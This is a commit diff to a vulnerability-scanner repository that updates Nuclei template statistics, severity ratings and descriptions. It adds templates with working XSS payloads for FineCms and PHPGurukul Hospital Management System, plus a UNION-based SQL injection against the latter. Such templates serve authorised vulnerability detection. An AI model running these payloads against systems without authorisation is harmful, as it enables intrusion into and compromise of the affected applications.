fix fingerprint; up PoCs 2022-08-30

config/config.json

@@ -66,7 +66,7 @@
   "KsubdomainRegxp": "([0-9a-zA-Z\\-]+\\.[0-9a-zA-Z\\-]+)$",
   "naabu_dns": {},
   "naabu": {"TopPorts": "1000","ScanAllIPS": true,"Threads": 50,"EnableProgressBar": false},
-  "priorityNmap": false,
+  "priorityNmap": true,
   "noScan": false,
   "enableMultNuclei": false,
   "enableNuclei": true,

config/nuclei-templates/README.md

@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1363 | daffainfo     |   629 | cves             |  1336 | info     |  1433 | http    |  3740 |
-| panel     |   627 | dhiyaneshdk   |   551 | exposed-panels   |   635 | high     |   971 | file    |    76 |
-| lfi       |   497 | pikpikcu      |   325 | vulnerabilities  |   524 | medium   |   804 | network |    51 |
-| xss       |   467 | pdteam        |   269 | technologies     |   276 | critical |   462 | dns     |    17 |
-| wordpress |   417 | geeknik       |   187 | exposures        |   272 | low      |   220 |         |       |
-| exposure  |   389 | dwisiswant0   |   169 | token-spray      |   230 | unknown  |     7 |         |       |
-| cve2021   |   340 | 0x_akoko      |   158 | misconfiguration |   215 |          |       |         |       |
-| rce       |   333 | princechaddha |   150 | workflows        |   187 |          |       |         |       |
-| wp-plugin |   312 | pussycat0x    |   133 | default-logins   |   102 |          |       |         |       |
-| tech      |   288 | gy741         |   126 | file             |    76 |          |       |         |       |
-
-**293 directories, 4110 files**.
+| cve       |  1388 | daffainfo     |   630 | cves             |  1363 | info     |  1450 | http    |  3773 |
+| panel     |   642 | dhiyaneshdk   |   558 | exposed-panels   |   649 | high     |   974 | file    |    76 |
+| edb       |   548 | pikpikcu      |   326 | vulnerabilities  |   510 | medium   |   811 | network |    51 |
+| lfi       |   496 | pdteam        |   269 | technologies     |   278 | critical |   469 | dns     |    17 |
+| xss       |   472 | geeknik       |   187 | exposures        |   273 | low      |   219 |         |       |
+| wordpress |   415 | dwisiswant0   |   169 | token-spray      |   230 | unknown  |     7 |         |       |
+| exposure  |   394 | 0x_akoko      |   158 | misconfiguration |   217 |          |       |         |       |
+| cve2021   |   343 | princechaddha |   150 | workflows        |   189 |          |       |         |       |
+| rce       |   335 | pussycat0x    |   133 | default-logins   |   102 |          |       |         |       |
+| wp-plugin |   312 | ritikchaddha  |   130 | file             |    76 |          |       |         |       |
+
+**294 directories, 4145 files**.
 
 </td>
 </tr>

config/nuclei-templates/TOP-10.md

@@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1363 | daffainfo     |   629 | cves             |  1336 | info     |  1433 | http    |  3740 |
-| panel     |   627 | dhiyaneshdk   |   551 | exposed-panels   |   635 | high     |   971 | file    |    76 |
-| lfi       |   497 | pikpikcu      |   325 | vulnerabilities  |   524 | medium   |   804 | network |    51 |
-| xss       |   467 | pdteam        |   269 | technologies     |   276 | critical |   462 | dns     |    17 |
-| wordpress |   417 | geeknik       |   187 | exposures        |   272 | low      |   220 |         |       |
-| exposure  |   389 | dwisiswant0   |   169 | token-spray      |   230 | unknown  |     7 |         |       |
-| cve2021   |   340 | 0x_akoko      |   158 | misconfiguration |   215 |          |       |         |       |
-| rce       |   333 | princechaddha |   150 | workflows        |   187 |          |       |         |       |
-| wp-plugin |   312 | pussycat0x    |   133 | default-logins   |   102 |          |       |         |       |
-| tech      |   288 | gy741         |   126 | file             |    76 |          |       |         |       |
+| cve       |  1388 | daffainfo     |   630 | cves             |  1363 | info     |  1450 | http    |  3773 |
+| panel     |   642 | dhiyaneshdk   |   558 | exposed-panels   |   649 | high     |   974 | file    |    76 |
+| edb       |   548 | pikpikcu      |   326 | vulnerabilities  |   510 | medium   |   811 | network |    51 |
+| lfi       |   496 | pdteam        |   269 | technologies     |   278 | critical |   469 | dns     |    17 |
+| xss       |   472 | geeknik       |   187 | exposures        |   273 | low      |   219 |         |       |
+| wordpress |   415 | dwisiswant0   |   169 | token-spray      |   230 | unknown  |     7 |         |       |
+| exposure  |   394 | 0x_akoko      |   158 | misconfiguration |   217 |          |       |         |       |
+| cve2021   |   343 | princechaddha |   150 | workflows        |   189 |          |       |         |       |
+| rce       |   335 | pussycat0x    |   133 | default-logins   |   102 |          |       |         |       |
+| wp-plugin |   312 | ritikchaddha  |   130 | file             |    76 |          |       |         |       |

config/nuclei-templates/cnvd/2020/CNVD-2020-23735.yaml

@@ -3,7 +3,7 @@ id: CNVD-2020-23735
 info:
   name: Xxunchi CMS - Local File Inclusion
   author: princechaddha
-  severity: medium
+  severity: high
   description: Xunyou CMS is vulnerable to local file inclusion. Attackers can use vulnerabilities to obtain sensitive information.
   reference:
     - https://www.cnvd.org.cn/flaw/show/2025171

config/nuclei-templates/cnvd/2021/CNVD-2021-30167.yaml

@@ -3,7 +3,7 @@ id: CNVD-2021-30167
 info:
   name: UFIDA NC BeanShell Remote Command Execution
   author: pikpikcu
-  severity: high
+  severity: critical
   description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
   reference:
     - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A

config/nuclei-templates/cves/2014/CVE-2014-8682.yaml

@@ -3,7 +3,7 @@ id: CVE-2014-8682
 info:
   name: Gogs (Go Git Service) - SQL Injection
   author: dhiyaneshDK,daffainfo
-  severity: high
+  severity: critical
   description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-8682

config/nuclei-templates/cves/2017/CVE-2017-11629.yaml

@@ -0,0 +1,37 @@
+id: CVE-2017-11629
+
+info:
+  name: FineCms 5.0.10 - Cross Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    dayrui FineCms through 5.0.10 has Cross Site Scripting (XSS) in controllers/api.php via the function parameter in a c=api&m=data2 request.
+  reference:
+    - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
+  classification:
+    cve-id: CVE-2017-11629
+  metadata:
+    verified: true
+  tags: cve,cve2017,xss,finecms
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>p不存在'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2020/CVE-2020-5191.yaml

@@ -0,0 +1,55 @@
+id: CVE-2020-5191
+
+info:
+  name: Hospital Management System 4.0 - Cross-Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.
+  reference:
+    - https://www.exploit-db.com/exploits/47841
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5191
+    - https://phpgurukul.com/hospital-management-system-in-php/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2020-5191
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve2020,hms,cms,xss,authenticated,edb,cve
+
+requests:
+  - raw:
+      - |
+        POST /hospital/hms/admin/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}&submit=&submit=
+
+      - |
+        POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<td class="hidden-xs"></td><script>alert(document.domain);</script><td>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2020/CVE-2020-5192.yaml

@@ -0,0 +1,53 @@
+id: CVE-2020-5192
+
+info:
+  name: Hospital Management System 4.0 - SQL Injection
+  author: TenBird
+  severity: high
+  description: |
+    PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple SQL injection vulnerabilities: multiple pages and parameters are not validating user input, and allow for the application's database and information to be fully compromised.
+  reference:
+    - https://www.exploit-db.com/exploits/47840
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5192
+    - https://phpgurukul.com/hospital-management-system-in-php/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2020-5192
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve2020,hms,cms,sqli,authenticated,edb,cve
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /hospital/hms/doctor/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}password={{password}}&submit=&submit=
+
+      - |
+        POST /hospital/hms/doctor/search.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2021/CVE-2021-24300.yaml

@@ -1,10 +1,10 @@
 id: CVE-2021-24300
 
 info:
-  name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS
+  name: WordPress WooCommerce <1.13.22 - Cross-Site Scripting
   author: cckuailong
   severity: medium
-  description: The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue.
+  description: WordPress WooCommerce before 1.13.22 contains a reflected cross-site scripting vulnerability via the slider import search feature because it does not properly sanitize the keyword GET parameter.
   reference:
     - https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24300
@@ -47,3 +47,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28

config/nuclei-templates/cves/2021/CVE-2021-24316.yaml

@@ -1,14 +1,15 @@
 id: CVE-2021-24316
 
 info:
-  name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
+  name: WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting
   author: 0x_Akoko
   severity: medium
-  description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
+  description: WordPress Mediumish theme 1.0.47 and prior contains an unauthenticated reflected cross-site scripting vulnerability. The 's' GET parameter is not properly sanitized by the search feature before it is output back on the page.
   reference:
     - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
     - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
     - https://www.wowthemes.net/themes/mediumish-wordpress/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24316
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -38,3 +39,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/28

config/nuclei-templates/cves/2021/CVE-2021-24320.yaml

@@ -1,15 +1,16 @@
 id: CVE-2021-24320
 
 info:
-  name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value,
-    bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing
-    page, leading to reflected Cross-Site Scripting issues.
+  description: WordPress Bello Directory & Listing theme before 1.6.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape the listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value,
+    bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in the ints listing
+    page.
   reference:
     - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
     - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24320
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28

config/nuclei-templates/cves/2021/CVE-2021-24335.yaml

@@ -1,15 +1,15 @@
 id: CVE-2021-24335
 
 info:
-  name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue
+  description: WordPress Car Repair Services & Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-24335
     - https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557
     - https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt
     - https://wpscan.com/vulnerability/39258aba-2449-4214-a490-b8e46945117d
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24335
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28

config/nuclei-templates/cves/2021/CVE-2021-24342.yaml

@@ -1,10 +1,10 @@
 id: CVE-2021-24342
 
 info:
-  name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress JNews Theme <8.0.6 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.
+  description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).
   reference:
     - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24342
@@ -41,3 +41,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28

config/nuclei-templates/cves/2021/CVE-2021-24364.yaml

@@ -1,11 +1,10 @@
 id: CVE-2021-24364
 
 info:
-  name: Jannah < 5.4.4 (XSS)
+  name: WordPress Jannah Theme <5.4.4 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site
-    Scripting (XSS) vulnerability.
+  description: WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page.
   reference:
     - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24364
@@ -37,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28

config/nuclei-templates/cves/2021/CVE-2021-24387.yaml

@@ -1,17 +1,16 @@
 id: CVE-2021-24387
 
 info:
-  name: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS
+  name: WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting
   author: suman_kar
   severity: medium
   description: |
-    The WP Pro Real Estate 7 WordPress theme before 3.1.1 did not properly sanitise the ct_community parameter
-    in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which
-    can be triggered in both unauthenticated or authenticated user context
+    WordPress Pro Real Estate 7 theme before 3.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the ct_community parameter in its search listing page before outputting it back.
   reference:
     - https://cxsecurity.com/issue/WLB-2021070041
     - https://wpscan.com/vulnerability/27264f30-71d5-4d2b-8f36-4009a2be6745
     - https://contempothemes.com/wp-real-estate-7/changelog/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24387
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -40,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28